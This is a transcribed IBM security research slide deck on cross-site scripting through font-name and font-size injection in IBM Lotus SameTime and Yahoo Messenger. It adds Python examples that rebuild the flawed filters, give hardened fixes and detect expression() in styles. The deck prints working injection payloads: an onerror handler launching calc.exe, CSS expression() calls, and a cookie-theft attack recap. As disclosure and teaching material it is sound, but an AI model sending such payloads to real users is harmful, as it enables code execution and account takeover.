© 2012 IBM Corporation
IBM Security Systems
Stylish XSS
via Font Name Injection
Background - Instant Messengers
Background - Instant Messengers
<Text Style="
font-family:Segoe UI;
font-weight:bold;
font-style:italic;
color:#008000;
">Hi!</Text>
Background - Instant Messengers
Every time I’ve seen this screen, I wondered
“What if I could use some HTML here…”
Background - Windows Fonts
Windows accepts basically any character as
part of the font name
Font name length limited to ~30 chars
IBM Lotus SameTime Messenger
<span style="font-size:14pt;font-family:Segoe UI;
font-weight:normal;font-style:normal;">You Do!</span>
SameTime - Exploit - CSS
Font Name: expression(alert(1));
SameTime - Exploit - CSS
Font Name: expression(alert(1));
Desired output:
<span style= ";font-family:expression(alert(1));…">
Actual output:
<span style="">
SameTime - Exploit - New Attribute
Font Name: "onclick="alert(1)"
Desired output:
<span style="font-size:9pt;font-family:"
onclick="alert(1)" ...">
Actual output:
<span style="font-size:9pt;font-family:"
onclick="">
SameTime - Exploit
~50 Fonts Later
SameTime - Exploit - Found
Message sent:
<span style="…font-family:
Message Received:
<span style="…font-family:
SameTime - Exploit - Found
Message sent:
<span style="…font-family:e0"
<<style<style</style>img x='>
Message Received:
<span style="…font-family:
SameTime - Exploit - Found
Message sent:
<span style="…font-family:e0"
<<style<style</style>img x='>
Message Received:
<span style="…font-family:e0">
<img x='>
SameTime - Exploit - Found
Message sent:
<span style="…font-family:e0"
<<style<style</style>img x='>Rest of Orig CSS">
Message Received:
<span style="…font-family:e0">
<img x='>Rest of Orig CSS">
SameTime - Exploit - Found
Message sent:
<span style="…font-family:e0"
<<style<style</style>img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:\windows\system32\calc.exe" '
Message Received:
<span style="…font-family:e0">
<img x='>Rest of Orig CSS">
SameTime - Exploit - Found
Message sent:
<span style="…font-family:e0"
<<style<style</style>img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:\windows\system32\calc.exe" '
</span>
Message Received:
<span style="…font-family:e0">
<img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:\windows\system32\calc.exe" '
</span>
SameTime – Remote Code Execution
<span style="font-size:14pt;font-family:e0">
<img x=';font-weight:normal;font-style:normal;">' src='x'
onerror='location="c:\windows\system32\calc.exe"'</span>
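The filter failure walked through on the SameTime slides above, as an added example that is not the slides' or IBM's code: a hypothetical blocklist filter reconstructed from the quoted outputs, the unsafe rendering it fed, and an allowlist renderer that rejects every font name the slides tried. The font-name and body payloads are constructed stand-ins (the body uses alert(1) instead of the slides' location= handler).

```python
"""Font-name injection (SameTime slides): a blocklist filter that strips tags
and an allowlist renderer, side by side.

Added example; not code from the slides, from IBM Sametime or from any other
product. The filter is a hypothetical reconstruction that reproduces the
rendered output quoted on the slides (`<<style<style</style>img x='>` coming
out as `<img x='>`, `onclick="alert(1)"` coming out as `onclick=""`); the real
client code is not shown.
"""
import html
import re

# Constructed stand-ins for the slide payloads. The font name stays under the
# ~30-character Windows limit; the message body carries the handler, which is
# why escaping the body with text-context rules alone was not enough.
FONT_NAME_PAYLOAD = "e0\" <<style<style</style>img x='"
BODY_PAYLOAD = "' src='x' onerror='alert(1)'"   # benign stand-in for the slide's onerror body


def blocklist_filter(font_name: str) -> str:
    """Hypothetical single-pass blocklist: remove <style>...</style> blocks and
    blank event-handler values. It never re-examines what the removal leaves
    behind, so `<<style<style</style>img` collapses into `<img`."""
    name = re.sub(r"<style.*?</style>", "", font_name, flags=re.I | re.S)
    name = re.sub(r"(on\w+\s*=\s*)(\"[^\"]*\"|'[^']*')", r'\1""', name, flags=re.I)
    return name


def escape_text(body: str) -> str:
    """Text-context escaping only (& < > "), as a client that expects the body
    to land between tags would do. Single quotes pass through untouched."""
    return html.escape(body, quote=False).replace('"', "&quot;")


def render_unsafe(font_name: str, body: str) -> str:
    """Vulnerable shape: the filtered font name is concatenated into the style
    attribute. The `"` in the name closes the attribute early, `<img x='` opens
    a tag whose x= value swallows the rest of the client's CSS, the body then
    supplies src/onerror, and the client's own </span> closes the img tag."""
    name = blocklist_filter(font_name)
    return (f'<span style="font-size:14pt;font-family:{name};'
            f'font-weight:normal;font-style:normal;">{escape_text(body)}</span>')


# Allowlist for the font-family slot: letters, digits, spaces, hyphens, at most
# 31 characters (the slides note Windows font names are limited to ~30 chars).
FONT_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9 \-]{0,30}")


def validate_font_name(font_name: str) -> str:
    """Reject anything outside the allowlist instead of trying to strip it."""
    if not FONT_NAME_RE.fullmatch(font_name):
        raise ValueError(f"font name rejected: {font_name!r}")
    return font_name


def render_safe(font_name: str, body: str) -> str:
    """Hardened shape: validate the name, quote it as a CSS string, then
    attribute-escape the whole style value and fully escape the body
    (quotes included), so neither slot can change parsing context."""
    name = validate_font_name(font_name)
    style = f'font-size:14pt;font-family:"{name}";font-weight:normal;font-style:normal;'
    return f'<span style="{html.escape(style)}">{html.escape(body)}</span>'


def is_rejected(font_name: str) -> bool:
    """True when the allowlist refuses the name."""
    try:
        validate_font_name(font_name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(render_unsafe(FONT_NAME_PAYLOAD, BODY_PAYLOAD))
    print(render_safe("Segoe UI", "You Do!"))
    for name in ("expression(alert(1));", '"onclick="alert(1)"', FONT_NAME_PAYLOAD):
        print(repr(name), "->", "rejected" if is_rejected(name) else "accepted")
```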
Yahoo Messenger
Yahoo Messenger – Message View
Lots of Colors, but that’s about it…
Yahoo Messenger - History View
Yahoo Messenger - History View
Yahoo Messenger - History View
Finally, Yahoo's purple alert!
Yahoo Messenger - The Payload
<img src="x"onmouseover="alert(1)">
Yahoo Messenger - Digging Deeper
Wait, what?
It's not local?!
Yahoo Messenger - Digging Deeper
Accessing this URL in Chrome yields the same result.
Yahoo Messenger - Digging Deeper
That means I can read the cookie!
And steal your account!
Yahoo Messenger - Recap
1. Send the victim a message that contains a malicious HTML snippet
2. Wait 3-4 hours for it to show up in the history
3. Convince the user to access his history, or send him a direct link to it (after all, it is not local)
4. Have the victim click the Instant Message from the drop-down box
Yahoo Messenger - Introducing: Web Messenger!
Finally I can see the results of my attacks in
real time!
Yahoo Messenger - Web Messenger
During the tests, I noticed that a <Font> tag sent as part of the message text is rendered differently in the Web Messenger.
• The message:
<font face="xxx" size="20">33333</font>
• Was rendered as:
<font style="font-size:20pt" face="xxx"
id="yui_3_2_0_20_1330267588862427">33333</font>
Yahoo Messenger - Exploiting CSS
Add a new rule with an expression() call.
Yahoo Messenger - Exploiting CSS
Started With:
<font face=ssss size="1&color:red">xxxx</font>
To my surprise, the response came back as I hoped:
<font style="font-size:1&amp;color:red" >xxxx</font>
Yahoo Messenger - Exploiting CSS
Next was the expression:
<font face=sssss size="1&color:expression(alert(1))"
>xxxx</font>
And again, it seems like nothing is filtering this...
<font style="font-size:1&amp;color:expression(alert(1))"
>xxxx</font>
Yahoo Messenger - Exploiting CSS
Time to open Internet Explorer!
Yahoo Web Messenger - IE Version
Yahoo Web Messenger - IE Version
The Rules (for IE):
1. The Size attribute must be surrounded by
double-quotes (" ")
2. The size value must be followed by the "pt;"
suffix
<font size="15pt;"> <font style="font-size=15pt;">
Yahoo Web Messenger - IE Version
By tweaking the size value,
a new Font-Family CSS rule could be injected.
<font size="15pt;font-family:aaaa;">
<font style="font-size=15pt;font-family: aaaa;">
Yahoo Web Messenger - IE Version
With all that in mind, and ~30 <Font> tags later, came the following payload that bypasses the CSS filtering:
<font size="15pt;font-family:expression(alert(1));">
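The size-to-font-size rewrite from the Yahoo Web Messenger slides, as an added example that is not Yahoo's code: a hypothetical reconstruction of the unsafe rewrite that reproduces the quoted markup, a small declaration splitter showing why the ";" terminator in the IE rules mattered while the "&" did not, a detection check for expression() in stored or rendered styles, and a hardened rewrite that parses the size as a number. The sample size values are constructed stand-ins for the ones tried on the slides.

```python
"""Attribute-to-CSS rewriting (Yahoo Web Messenger slides): the <font size>
to style="font-size:..." mapping as a constructed vulnerable/hardened pair.

Added example, not Yahoo's code. The unsafe rewrite is a hypothetical
reconstruction that reproduces the rendered markup quoted on the slides; the
hardened version parses the size to an integer so the ';' terminator and the
'&' the slides relied on never reach the style attribute. The X-UA-Compatible
IE=8 header on the slides only hid the symptom in one browser mode; the fix
belongs in the rewrite.
"""
import html
import re

# Constructed stand-ins for the size values tried on the slides.
SIZE_LEGIT = "20"
SIZE_ENTITY = "1&color:expression(alert(1))"                # no ';' -> one malformed declaration
SIZE_TERMINATED = "15pt;font-family:expression(alert(1));"  # ';' -> a second declaration


def rewrite_font_unsafe(face: str, size: str) -> str:
    """HTML attribute escaping is applied (so '&' becomes '&amp;', exactly as the
    slides show), but that is the wrong defence for a value that is re-read as a
    CSS declaration: ';' ':' '(' and ')' are all ordinary attribute text."""
    return f'<font style="font-size:{html.escape(size)}" face="{html.escape(face)}">'


def style_value(font_tag: str) -> str:
    """Pull the style attribute value out of a rendered <font> tag."""
    m = re.search(r'style="([^"]*)"', font_tag)
    return m.group(1) if m else ""


def css_declarations(style_attr_value: str) -> list[tuple[str, str]]:
    """Approximate what the browser sees: entity-decode the attribute value,
    then split it into property/value pairs on ';'. Not a full CSS parser."""
    decoded = html.unescape(style_attr_value)
    decls = []
    for chunk in decoded.split(";"):
        if ":" in chunk:
            prop, _, value = chunk.partition(":")
            decls.append((prop.strip().lower(), value.strip()))
    return decls


DYNAMIC_CSS_RE = re.compile(r"expression\s*\(", re.I)


def has_dynamic_css(style_attr_value: str) -> bool:
    """Detection check for rendered output or stored messages: any declaration
    whose value invokes the legacy IE expression() function."""
    return any(DYNAMIC_CSS_RE.search(value) for _, value in css_declarations(style_attr_value))


SIZE_RE = re.compile(r"\s*(\d{1,2})\s*(pt)?\s*")
FACE_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9 \-]{0,30}")


def rewrite_font_safe(face: str, size: str) -> str:
    """Hardened rewrite: the size is parsed to an integer in a sane range and
    re-emitted from that integer; the face is allowlisted and quoted as a CSS
    string; the finished style value is attribute-escaped once."""
    m = SIZE_RE.fullmatch(size)
    if not m:
        raise ValueError(f"size rejected: {size!r}")
    pt = int(m.group(1))
    if not 6 <= pt <= 72:
        raise ValueError(f"size out of range: {pt}")
    if not FACE_RE.fullmatch(face):
        raise ValueError(f"face rejected: {face!r}")
    style = f'font-size:{pt}pt;font-family:"{face}";'
    return f'<font style="{html.escape(style)}">'


def size_rejected(face: str, size: str) -> bool:
    """True when the hardened rewrite refuses the input."""
    try:
        rewrite_font_safe(face, size)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for size in (SIZE_LEGIT, SIZE_ENTITY, SIZE_TERMINATED):
        tag = rewrite_font_unsafe("xxx", size)
        print(tag)
        print("  declarations:", css_declarations(style_value(tag)),
              "| expression():", has_dynamic_css(style_value(tag)),
              "| hardened rejects:", size_rejected("xxx", size))
    print(rewrite_font_safe("xxx", SIZE_LEGIT))
```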
Yahoo Web Messenger - IE Version
It should work correctly according to the rendered source in
IE Developer Tools
Yahoo Web Messenger - IE Version
Yet somehow, no alert
Yahoo Web Messenger - Uber Meta!
After ~5 more hours of fiddling and long, lonely IM chats with myself,
I finally found what I was afraid of.
Or in other words, the "No Expression For You" meta tag:
<meta http-equiv="X-UA-Compatible" content="IE=8"/>
Yahoo Web Messenger - Going Old School
Fired up my Windows XP VM
and kicked out IE8
Yahoo Web Messenger - Finally
Yahoo Messenger - History Window
Questions?

Weitere ähnliche Inhalte

Was ist angesagt?

Introduction to node.js
Introduction to node.jsIntroduction to node.js
Introduction to node.jsDinesh U
 
API Virtualization: Mocking on Steroids
API Virtualization: Mocking on SteroidsAPI Virtualization: Mocking on Steroids
API Virtualization: Mocking on SteroidsSmartBear
 
TypeScript for Java Developers
TypeScript for Java DevelopersTypeScript for Java Developers
TypeScript for Java DevelopersYakov Fain
 
Introduction to Node.js
Introduction to Node.jsIntroduction to Node.js
Introduction to Node.jsVikash Singh
 
Web assembly overview by Mikhail Sorokovsky
Web assembly overview by Mikhail SorokovskyWeb assembly overview by Mikhail Sorokovsky
Web assembly overview by Mikhail SorokovskyValeriia Maliarenko
 
React Architecture & Best Practices.pptx
React Architecture & Best Practices.pptxReact Architecture & Best Practices.pptx
React Architecture & Best Practices.pptxAleksandarKondov
 
How To be a Backend developer
How To be a Backend developer    How To be a Backend developer
How To be a Backend developer Ramy Hakam
 
BDD in Action – principles, practices and real-world application
BDD in Action – principles, practices and real-world applicationBDD in Action – principles, practices and real-world application
BDD in Action – principles, practices and real-world applicationJohn Ferguson Smart Limited
 
Introduction to Node js
Introduction to Node jsIntroduction to Node js
Introduction to Node jsAkshay Mathur
 
React workshop presentation
React workshop presentationReact workshop presentation
React workshop presentationBojan Golubović
 
Introduction to ReactJS
Introduction to ReactJSIntroduction to ReactJS
Introduction to ReactJSHoang Long
 
android sqlite
android sqliteandroid sqlite
android sqliteDeepa Rani
 
Introduction to Node JS.pdf
Introduction to Node JS.pdfIntroduction to Node JS.pdf
Introduction to Node JS.pdfBareen Shaikh
 
Nestjs MasterClass Slides
Nestjs MasterClass SlidesNestjs MasterClass Slides
Nestjs MasterClass SlidesNir Kaufman
 

Was ist angesagt? (20)

Introduction to node.js
Introduction to node.jsIntroduction to node.js
Introduction to node.js
 
API Virtualization: Mocking on Steroids
API Virtualization: Mocking on SteroidsAPI Virtualization: Mocking on Steroids
API Virtualization: Mocking on Steroids
 
Selenium
SeleniumSelenium
Selenium
 
TypeScript for Java Developers
TypeScript for Java DevelopersTypeScript for Java Developers
TypeScript for Java Developers
 
Using the Splunk Java SDK
Using the Splunk Java SDKUsing the Splunk Java SDK
Using the Splunk Java SDK
 
Introduction to Node.js
Introduction to Node.jsIntroduction to Node.js
Introduction to Node.js
 
Web assembly overview by Mikhail Sorokovsky
Web assembly overview by Mikhail SorokovskyWeb assembly overview by Mikhail Sorokovsky
Web assembly overview by Mikhail Sorokovsky
 
React Architecture & Best Practices.pptx
React Architecture & Best Practices.pptxReact Architecture & Best Practices.pptx
React Architecture & Best Practices.pptx
 
How To be a Backend developer
How To be a Backend developer    How To be a Backend developer
How To be a Backend developer
 
Introduction to NodeJS
Introduction to NodeJSIntroduction to NodeJS
Introduction to NodeJS
 
BDD in Action – principles, practices and real-world application
BDD in Action – principles, practices and real-world applicationBDD in Action – principles, practices and real-world application
BDD in Action – principles, practices and real-world application
 
SOLID Principles
SOLID PrinciplesSOLID Principles
SOLID Principles
 
NestJS
NestJSNestJS
NestJS
 
Introduction to Node js
Introduction to Node jsIntroduction to Node js
Introduction to Node js
 
React workshop presentation
React workshop presentationReact workshop presentation
React workshop presentation
 
Introduction to ReactJS
Introduction to ReactJSIntroduction to ReactJS
Introduction to ReactJS
 
android sqlite
android sqliteandroid sqlite
android sqlite
 
Introduction to Node JS.pdf
Introduction to Node JS.pdfIntroduction to Node JS.pdf
Introduction to Node JS.pdf
 
Nestjs MasterClass Slides
Nestjs MasterClass SlidesNestjs MasterClass Slides
Nestjs MasterClass Slides
 
Rest api with node js and express
Rest api with node js and expressRest api with node js and express
Rest api with node js and express
 

Andere mochten auch

Andere mochten auch (13)

Expedited Removal Article_NM
Expedited Removal Article_NMExpedited Removal Article_NM
Expedited Removal Article_NM
 
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayuPeluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
 
BICSI NEC ARTICLE
BICSI NEC ARTICLEBICSI NEC ARTICLE
BICSI NEC ARTICLE
 
hjm
hjmhjm
hjm
 
rbusinessreport
rbusinessreportrbusinessreport
rbusinessreport
 
SECURITY SYSTEM INTEGRATION
SECURITY SYSTEM INTEGRATIONSECURITY SYSTEM INTEGRATION
SECURITY SYSTEM INTEGRATION
 
NewMetricsforCCTV_edited
NewMetricsforCCTV_editedNewMetricsforCCTV_edited
NewMetricsforCCTV_edited
 
CIRCLES OF COVERAGE FOR TELECOM ROOMS
CIRCLES OF COVERAGE FOR TELECOM ROOMSCIRCLES OF COVERAGE FOR TELECOM ROOMS
CIRCLES OF COVERAGE FOR TELECOM ROOMS
 
Untitled Presentation
Untitled PresentationUntitled Presentation
Untitled Presentation
 
AV system and lighting controls integration
AV system and lighting controls integrationAV system and lighting controls integration
AV system and lighting controls integration
 
حب الوطن من الايمان
حب الوطن من الايمانحب الوطن من الايمان
حب الوطن من الايمان
 
Syarikat multinasional
Syarikat multinasionalSyarikat multinasional
Syarikat multinasional
 
Ensayo
Ensayo Ensayo
Ensayo
 

Ähnlich wie Stylish XSS via Font Name Injection

Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...CODE BLUE
 
Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfLayer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfdistortdistort
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Peter Sabev
 
eXploitable Markup Language
eXploitable Markup LanguageeXploitable Markup Language
eXploitable Markup Languagesghctoma
 
Google chrome sandbox
Google chrome sandboxGoogle chrome sandbox
Google chrome sandboxNephi Johnson
 
Securing your web applications in CF 2016
Securing your web applications in CF 2016Securing your web applications in CF 2016
Securing your web applications in CF 2016Pavan Kumar
 
Building high performing web pages
Building high performing web pagesBuilding high performing web pages
Building high performing web pagesNilesh Bafna
 
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningCA API Management
 
Malware analysis
Malware analysisMalware analysis
Malware analysisDen Iir
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdfssuser01066a
 
What's new in Xamarin.Forms?
What's new in Xamarin.Forms?What's new in Xamarin.Forms?
What's new in Xamarin.Forms?James Montemagno
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientAngelo Dell'Aera
 
Being HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeBeing HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeAman Kohli
 
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...OW2
 
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...Carl Tyler
 
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0Haytham Ghandour
 

Ähnlich wie Stylish XSS via Font Name Injection (20)

Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
 
Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfLayer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdf
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
 
Usb hack
Usb hackUsb hack
Usb hack
 
eXploitable Markup Language
eXploitable Markup LanguageeXploitable Markup Language
eXploitable Markup Language
 
Google chrome sandbox
Google chrome sandboxGoogle chrome sandbox
Google chrome sandbox
 
Securing your web applications in CF 2016
Securing your web applications in CF 2016Securing your web applications in CF 2016
Securing your web applications in CF 2016
 
Building high performing web pages
Building high performing web pagesBuilding high performing web pages
Building high performing web pages
 
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And Hardening
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdf
 
What's new in Xamarin.Forms?
What's new in Xamarin.Forms?What's new in Xamarin.Forms?
What's new in Xamarin.Forms?
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclient
 
Hacking_PPT
Hacking_PPT Hacking_PPT
Hacking_PPT
 
Being HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeBeing HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on Purpose
 
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
 
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
 
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
 

Kürzlich hochgeladen

Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 

Kürzlich hochgeladen (20)

Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
